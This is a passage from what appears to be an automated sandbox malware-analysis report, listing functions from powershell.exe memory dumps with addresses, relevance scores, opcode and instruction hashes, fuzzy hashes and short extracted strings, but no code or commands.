                                                                                        • Opcode ID: b900196d67be6062472e7b0dfbe84324ca0aa8ceaaa2ded74ca7553fc3f4dd6c
                                                                                        • Instruction ID: 142fcf5d3ecace35b78da45a9aa6feb3d10710e34e6c178b10ba83dafe408f5f
                                                                                        • Opcode Fuzzy Hash: b900196d67be6062472e7b0dfbe84324ca0aa8ceaaa2ded74ca7553fc3f4dd6c
                                                                                        • Instruction Fuzzy Hash: D0E04877F1DA0509FB59566C68621F9B3D2DF85121744147FD24EC2447D81AA8164245
                                                                                        Function 00007FFD3450948E Relevance: .0, Instructions: 30COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333730795.00007FFD34500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34500000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34500000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9af856763d23b615734ce8dc1b009527d1d65a121cec2e29298f94286b1b12b6
                                                                                        • Instruction ID: 4aaf78e29b84175ef00bfd8171c66018044374290bebe3f7d1d81d19484ba4bc
                                                                                        • Opcode Fuzzy Hash: 9af856763d23b615734ce8dc1b009527d1d65a121cec2e29298f94286b1b12b6
                                                                                        • Instruction Fuzzy Hash: 94E0923170D9494FDF95EB5C94918A473E0EF6931030401AAE009CB19BDD29EC848781

                                                                                        Non-executed Functions

                                                                                        Function 00007FFD3443DB65 Relevance: 1.5, Strings: 1, Instructions: 285COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333142720.00007FFD34430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34430000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34430000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: hM_^
                                                                                        • API String ID: 0-375661323
                                                                                        • Opcode ID: f137ee5d7b3fc3063804fede31b2a859233e7689a0c78d2ce1b2d89a2b2287fb
                                                                                        • Instruction ID: e5af34a19ac4370ac81046e868ca719ec2f1d03bd980fc4c67ad1e2bc9f1af80
                                                                                        • Opcode Fuzzy Hash: f137ee5d7b3fc3063804fede31b2a859233e7689a0c78d2ce1b2d89a2b2287fb
                                                                                        • Instruction Fuzzy Hash: A6811CA3B0D6965BE31277AC68B22E93BE4DF47635B0D01F3C298DA0C3ED4D24179291
                                                                                        Function 00007FFD34434D08 Relevance: 1.4, Strings: 1, Instructions: 166COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333142720.00007FFD34430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34430000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34430000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ^
                                                                                        • API String ID: 0-1590793086
                                                                                        • Opcode ID: 7fb80e236a689fb5e8fc50ad0501bbefcada416b8b3659f96b4c8e1bb00ce553
                                                                                        • Instruction ID: 4bf4013d62ea14166bc7c751bcd26d20a7057a89b5c450387623c53310ef999b
                                                                                        • Opcode Fuzzy Hash: 7fb80e236a689fb5e8fc50ad0501bbefcada416b8b3659f96b4c8e1bb00ce553
                                                                                        • Instruction Fuzzy Hash: 6F51B667F0D6DB2BF763462C68B60D93BD0DF53670B0A02B3C685C60D79D4DA816A251
                                                                                        Function 00007FFD34433912 Relevance: .2, Instructions: 195COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333142720.00007FFD34430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34430000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34430000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f36b2040392a54c6e6f46314fc341bafe26908622bf113f6243e26323c521fc2
                                                                                        • Instruction ID: 38dec14e49dc0bb4f102d3232271891c0c340dfca76b8539482fa8861101f8d0
                                                                                        • Opcode Fuzzy Hash: f36b2040392a54c6e6f46314fc341bafe26908622bf113f6243e26323c521fc2
                                                                                        • Instruction Fuzzy Hash: 6151F357F0D7D68FE722A66C58F20E57FA0DF5366970E00F7C285CA493AD4C2806A352

                                                                                        Executed Functions

                                                                                        Function 06F780E0 Relevance: .7, Instructions: 692COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 38d27373318f3d5e739e943c19b3f64cf060ed551a60b98427fef5e9506fb44a
                                                                                        • Instruction ID: d540018c2f7477da80089d1141e8a106b87b3023a2125abb2deaa94d570c8deb
                                                                                        • Opcode Fuzzy Hash: 38d27373318f3d5e739e943c19b3f64cf060ed551a60b98427fef5e9506fb44a
                                                                                        • Instruction Fuzzy Hash: 90323831F00205DFDBA49F69C858ABBBBF2AF85290F14807BD566CB245DB31C941C7A2
                                                                                        Function 06F75400 Relevance: 8.3, Strings: 6, Instructions: 792COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (f\l$(f\l$(f\l$(f\l$(f\l$(f\l
                                                                                        • API String ID: 0-1181456973
                                                                                        • Opcode ID: 76299946d18779db8c1d1d328785dbb6d0ca2825089730450b3fbd4dc5c0c15a
                                                                                        • Instruction ID: 64326312cbfd2a9e7678f71ba2a95f4c7cabb034b631583d6ca0170d27fc257c
                                                                                        • Opcode Fuzzy Hash: 76299946d18779db8c1d1d328785dbb6d0ca2825089730450b3fbd4dc5c0c15a
                                                                                        • Instruction Fuzzy Hash: D1623B74F012048FEB54DB98C855BAAB7F2AF85304F24C06AD90A9F355CB72ED46CB91
                                                                                        Function 06F767F0 Relevance: 8.1, Strings: 6, Instructions: 647COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (f\l$(f\l$(f\l$(f\l$x.Mk$-Mk
                                                                                        • API String ID: 0-1482531275
                                                                                        • Opcode ID: 4aabf7a250c9f5ace39ed0aaf11a907c3e64f4e33bab64452fedf57d9f94925a
                                                                                        • Instruction ID: 926d52a494af887d3e14fcae581cefce85b8bfe37e0af949f4824c4058c612be
                                                                                        • Opcode Fuzzy Hash: 4aabf7a250c9f5ace39ed0aaf11a907c3e64f4e33bab64452fedf57d9f94925a
                                                                                        • Instruction Fuzzy Hash: E4423B74E11214CFEB64DFA8C851BAABBB2AF85304F2181AAD509AF355CB31DD41CF91
                                                                                        Function 06F76E6B Relevance: 6.6, Strings: 5, Instructions: 395COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (f\l$(f\l$x.Mk$x.Mk$-Mk
                                                                                        • API String ID: 0-1366186035
                                                                                        • Opcode ID: c83b5ae08e91deca5417215584b11dddb8e645f411bdb886469bca926181de34
                                                                                        • Instruction ID: 5d26758ae545c7b112019fa6eca89dae69870edcca00b069159bfd2104f61f4e
                                                                                        • Opcode Fuzzy Hash: c83b5ae08e91deca5417215584b11dddb8e645f411bdb886469bca926181de34
                                                                                        • Instruction Fuzzy Hash: 1CF18074B002149FE764EB64CC61FAEB7B3AB85304F1180AAE5096F391CB71DD818F92
                                                                                        Function 06F75058 Relevance: 4.0, Strings: 3, Instructions: 247COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (f\l$(f\l$x.Mk
                                                                                        • API String ID: 0-668568786
                                                                                        • Opcode ID: 3c736371447c15008af6d93e405121a2d040cb4463a5a79a124fe12b9f28ffdc
                                                                                        • Instruction ID: af00851cb44f08ddbe64a779e50bd7b1bf98f347f2972966909d656af2c5ff12
                                                                                        • Opcode Fuzzy Hash: 3c736371447c15008af6d93e405121a2d040cb4463a5a79a124fe12b9f28ffdc
                                                                                        • Instruction Fuzzy Hash: 64916B75B012049FEB94DBA4C851BAEB7E3AF89300F11846AE5056F395CF71ED41CBA2
                                                                                        Function 06F753E3 Relevance: 3.1, Strings: 2, Instructions: 623COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (f\l$(f\l
                                                                                        • API String ID: 0-493901671
                                                                                        • Opcode ID: 6ee42b444c6886b79a332626cdc916999bfaac6d79b6a78a69bca2394b4c2f01
                                                                                        • Instruction ID: 2ab49d5854cedef4ab00d1c1d28067b6f6eb97792e89b8517ca4a30d305f5dd0
                                                                                        • Opcode Fuzzy Hash: 6ee42b444c6886b79a332626cdc916999bfaac6d79b6a78a69bca2394b4c2f01
                                                                                        • Instruction Fuzzy Hash: 2C425A75E002048FEB54DB94C485FAAB7B2AF85314F24C06AE90A9F355CB72ED46CF91
                                                                                        Function 06F73020 Relevance: 2.9, Strings: 2, Instructions: 355COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 84Zl$84Zl
                                                                                        • API String ID: 0-2887310928
                                                                                        • Opcode ID: 5d27959406dc04f2dfbecd50dfb3cc54b34ad796f606080de368f70c8d62cfea
                                                                                        • Instruction ID: dbe4d420f5a09eb08f73a66a19b18ca8016078dd06c1e2fd9e30432ee226529c
                                                                                        • Opcode Fuzzy Hash: 5d27959406dc04f2dfbecd50dfb3cc54b34ad796f606080de368f70c8d62cfea
                                                                                        • Instruction Fuzzy Hash: BEC1F632F04344EFD7A19F64C851B6ABBB2AF86610F19C0ABD444CF296CB31C846D7A1
                                                                                        Function 06F77B00 Relevance: 2.8, Strings: 2, Instructions: 339COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: x.Mk$-Mk
                                                                                        • API String ID: 0-3538127093
                                                                                        • Opcode ID: eaaca6c75f8253d1655d1c1a6ee928f3da3c0fc84cf4202c86f76e685878aa1f
                                                                                        • Instruction ID: 0e7d891c7a7fdbe8ed8116c122c58d5ac30670049dcc758a34c27f93a570ee51
                                                                                        • Opcode Fuzzy Hash: eaaca6c75f8253d1655d1c1a6ee928f3da3c0fc84cf4202c86f76e685878aa1f
                                                                                        • Instruction Fuzzy Hash: 95D17E74F102088FD764EBA8C855BAEBBB3AF89714F11802AD5056F395CB75DC41CBA2
                                                                                        Function 06F77AE4 Relevance: 2.8, Strings: 2, Instructions: 287COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: x.Mk$-Mk
                                                                                        • API String ID: 0-3538127093
                                                                                        • Opcode ID: 879485be813801bab982327a034e78670798be9314b0a42c7ff53f8879a0bb3c
                                                                                        • Instruction ID: 24136d1a0120047f25c031986c39d1c3d4f824e9d28c176b23215f1bf4f5d865
                                                                                        • Opcode Fuzzy Hash: 879485be813801bab982327a034e78670798be9314b0a42c7ff53f8879a0bb3c
                                                                                        • Instruction Fuzzy Hash: 55B17B74E10204CFD764EFA4C451BAEBBB2AF89714F21802AE4056F355CB75EC41CBA2
                                                                                        Function 06F75038 Relevance: 2.7, Strings: 2, Instructions: 231COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (f\l$x.Mk
                                                                                        • API String ID: 0-1699295758
                                                                                        • Opcode ID: 13b8fc6785552fda1cf081546ac230c9599d47f1c1e3c9ed197257e71bf3beb0
                                                                                        • Instruction ID: 78e35cf5098747fb0badaf2e26ed6dd2847ff751cce85c631b1a550d9aa7b87d
                                                                                        • Opcode Fuzzy Hash: 13b8fc6785552fda1cf081546ac230c9599d47f1c1e3c9ed197257e71bf3beb0
                                                                                        • Instruction Fuzzy Hash: A0916C75B012009FDB94DBA4C851FAEB7F2AF89304F11846AE505AF391CB75EC81CB62
                                                                                        Function 06F75C56 Relevance: 1.7, Strings: 1, Instructions: 482COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (f\l
                                                                                        • API String ID: 0-1519571060
                                                                                        • Opcode ID: ad966b4ed1f908a4c0f1838fe219dc703e9929fb73c392775b986bae2d8027b0
                                                                                        • Instruction ID: 67a5d2ec1ba4e96651ef289003a17287dac47317742b1302a8ed1ae3722a4090
                                                                                        • Opcode Fuzzy Hash: ad966b4ed1f908a4c0f1838fe219dc703e9929fb73c392775b986bae2d8027b0
                                                                                        • Instruction Fuzzy Hash: 23123C75E01204CFEB54DB94C445FAAB7B2EF85304F24806AE90A9F395CB72ED46CB91
                                                                                        Function 06F77F26 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: x.Mk
                                                                                        • API String ID: 0-581678365
                                                                                        • Opcode ID: 1138306851e7dc074f39395af666463d076ac9072d8210d1b9f8a5ada85ae8e2
                                                                                        • Instruction ID: 7ad1df6c71b0fe740f607e36d15019a52268a9329284436495ada64767a7ef16
                                                                                        • Opcode Fuzzy Hash: 1138306851e7dc074f39395af666463d076ac9072d8210d1b9f8a5ada85ae8e2
                                                                                        • Instruction Fuzzy Hash: 9D31D474B012149BE724ABA4C865FAF77B3EF86750F108029E9156F381CF759C418BA2
                                                                                        Function 06F7A2B5 Relevance: .1, Instructions: 131COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 08316ea41521fbea7209af0fd956d9fb43f7eb543e187973e89bb2eaeb80e35b
                                                                                        • Instruction ID: 626a4318f2c6a26b385ed8f3388fdd9f564fae14ad49154d3fd683f3c07e227e
                                                                                        • Opcode Fuzzy Hash: 08316ea41521fbea7209af0fd956d9fb43f7eb543e187973e89bb2eaeb80e35b
                                                                                        • Instruction Fuzzy Hash: 7B415D72F002108BDBE49BB89812AAFBB929FD6215B1540BFD5459F345DA37CD11C3B2
                                                                                        Function 06F78ADE Relevance: .1, Instructions: 115COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cbbd3d30aeba4a71a272780fea5ec9da4d620b57bd108c2568c1eec6b6cf4fca
                                                                                        • Instruction ID: 965ac0a9b296836a16c39535458ae1d8b0966c3427a55adf84fe5ec74b3217bb
                                                                                        • Opcode Fuzzy Hash: cbbd3d30aeba4a71a272780fea5ec9da4d620b57bd108c2568c1eec6b6cf4fca
                                                                                        • Instruction Fuzzy Hash: D9316BB2F00244CFDF649779986467EBB929FC52A4B1084BBD6228B345DF35D805C3B2
                                                                                        Function 06F70E18 Relevance: .1, Instructions: 94COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2da3a3f03a4ce42fef80b97b12b6e46b868388a928770ab554c7cddd41b46735
                                                                                        • Instruction ID: 9452a3ed0ddb55d70a4534df91ed1ea922276f29077e25fe85a8f516c3733294
                                                                                        • Opcode Fuzzy Hash: 2da3a3f03a4ce42fef80b97b12b6e46b868388a928770ab554c7cddd41b46735
                                                                                        • Instruction Fuzzy Hash: 00217D72B043199BF7B46ABA8811B3BB6D69FC5711F24843BE50ACB381CE75D941C361
                                                                                        Function 06F70F48 Relevance: .1, Instructions: 94COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ee2042ef52bf8021a4b80bbf055b40ca4e288115ebdcb93882d4c0fc79501a92
                                                                                        • Instruction ID: 3605841424c0bef531123442aa6031207a1f28eb93d77aec76c981e40a608636
                                                                                        • Opcode Fuzzy Hash: ee2042ef52bf8021a4b80bbf055b40ca4e288115ebdcb93882d4c0fc79501a92
                                                                                        • Instruction Fuzzy Hash: 0F212732B003159BFBB45AAA9C11B77B6DA9FC1611F24402BE50ACB286CE76C841C3A5
                                                                                        Function 06F70DFC Relevance: .1, Instructions: 79COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 11ce1192df866d4f1f0c93e2fe27e0c8518836fd27f2e6cd7b3a307a0b5f13b3
                                                                                        • Instruction ID: 088291949317584575760936df0f7477e495708897eb1fa3e86f65efbe77dd4d
                                                                                        • Opcode Fuzzy Hash: 11ce1192df866d4f1f0c93e2fe27e0c8518836fd27f2e6cd7b3a307a0b5f13b3
                                                                                        • Instruction Fuzzy Hash: 94213B71B083886BE7A15A668C10B367F969FC6710F18846BE585DB2D2CF75D940C371
                                                                                        Function 06F70F2C Relevance: .1, Instructions: 76COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 33ffd89f1b9e2c815bd47c4918325febc57035404bb5cecd595ebdf86b7928e1
                                                                                        • Instruction ID: e9ff500b43e610810bdfaba6b8f787e5eea937fd7532401154fd95214fa7ff58
                                                                                        • Opcode Fuzzy Hash: 33ffd89f1b9e2c815bd47c4918325febc57035404bb5cecd595ebdf86b7928e1
                                                                                        • Instruction Fuzzy Hash: 13213A72B043406BEB705A764C01BB37BAADF82710F28406BE9448B2C6DE79D544C379
                                                                                        Function 06F70C08 Relevance: .1, Instructions: 52COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 54dfe1162a76cc3f274aa4958caffb875a78dba2f55e4083951f551b7591a5cc
                                                                                        • Instruction ID: 5a1425dbd73ac2fa5a5fdd5fb57293986f8bf8f457415cc8084bd981fb0ed918
                                                                                        • Opcode Fuzzy Hash: 54dfe1162a76cc3f274aa4958caffb875a78dba2f55e4083951f551b7591a5cc
                                                                                        • Instruction Fuzzy Hash: 5D01DF3AB1022A8BD7A459AA940057AB7AADFC1623F14843FE549CA250DE32C845C7B0
                                                                                        Function 06F73204 Relevance: .0, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7d0604a1fdb50b7c7da549422a788b86761e0edd00369a012881c598512b7f2e
                                                                                        • Instruction ID: 5ef2a71e76893544805cf7edd5e1d08296b2958a6cc0f5f758041e80ebeadf0a
                                                                                        • Opcode Fuzzy Hash: 7d0604a1fdb50b7c7da549422a788b86761e0edd00369a012881c598512b7f2e
                                                                                        • Instruction Fuzzy Hash: B8F0E572905380AFD7518B51C854A11BFB1AF83611B5DC0CFD4448F1A7C736DD46DB91

                                                                                        Non-executed Functions

                                                                                        Function 06F763B8 Relevance: 10.3, Strings: 8, Instructions: 305COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (f\l$(f\l$(f\l$(f\l$(f\l$(f\l$(f\l$(f\l
                                                                                        • API String ID: 0-3235917835
                                                                                        • Opcode ID: 3a47e9603415d4f7f375dc91c188d2605293e73ba9ba96e9bc107edb49c3215f
                                                                                        • Instruction ID: 58a8c73cc3e4d6e32aed2b3821508d1c301ef0aafc96769e9458ce557d0fa65d
                                                                                        • Opcode Fuzzy Hash: 3a47e9603415d4f7f375dc91c188d2605293e73ba9ba96e9bc107edb49c3215f
                                                                                        • Instruction Fuzzy Hash: C2C17E75F00604CFDB64DF98C851A6EB7F2AB89310F14842ED91AAB745DB31ED42CB92
                                                                                        Function 06F7E660 Relevance: 8.9, Strings: 7, Instructions: 191COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (f\l$(f\l$(f\l$(f\l$4Yl$4Yl$tLNk
                                                                                        • API String ID: 0-3998921682
                                                                                        • Opcode ID: 407acdab42a1bf25f6e57a848b767ad46a51c0eab9ae7548d7753a83d04503a5
                                                                                        • Instruction ID: ddd266ac4b44d7812f77288759bb51468305269c1b696f66d4e81a70ff14c5b8
                                                                                        • Opcode Fuzzy Hash: 407acdab42a1bf25f6e57a848b767ad46a51c0eab9ae7548d7753a83d04503a5
                                                                                        • Instruction Fuzzy Hash: 08617175F00204DFD764DBA8C851A6ABBF3AF89710F1480ABD515AB355CB71EC42CB92
                                                                                        Function 06F7E0C8 Relevance: 5.3, Strings: 4, Instructions: 299COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (f\l$(f\l$x.Mk$-Mk
                                                                                        • API String ID: 0-2131718767
                                                                                        • Opcode ID: 920c58e280d64c655adf3a3cd2e8f01465ac8b0c7b820cfa8ee5a87aab108c68
                                                                                        • Instruction ID: 9573e460278b7e19b8b56e020736d6a5fab41880717cbe2fd24305c9709aaca7
                                                                                        • Opcode Fuzzy Hash: 920c58e280d64c655adf3a3cd2e8f01465ac8b0c7b820cfa8ee5a87aab108c68
                                                                                        • Instruction Fuzzy Hash: ACC17C74E00204DFDBA4DB98C851B6EBBB2AF89714F1484ABE8056F755DB31EC41CB92
                                                                                        Function 06F7D3C5 Relevance: 5.3, Strings: 4, Instructions: 286COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 84Zl$84Zl$84Zl$84Zl
                                                                                        • API String ID: 0-2779352645
                                                                                        • Opcode ID: 2f6c5a0151c2755ea272ad7179bb272b00f1862a62cdadce8830bfe9ce7145a7
                                                                                        • Instruction ID: f6d4e6c21562d2ed25cf41f6a90153e632ef40f047cad123b8028372df3d9fc8
                                                                                        • Opcode Fuzzy Hash: 2f6c5a0151c2755ea272ad7179bb272b00f1862a62cdadce8830bfe9ce7145a7
                                                                                        • Instruction Fuzzy Hash: 8EA10531F00204DFDB689F69D850B6ABBE2BF89314F54806AE9059B384CB31ED41CBA1
                                                                                        Function 06F763B7 Relevance: 5.3, Strings: 4, Instructions: 251COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
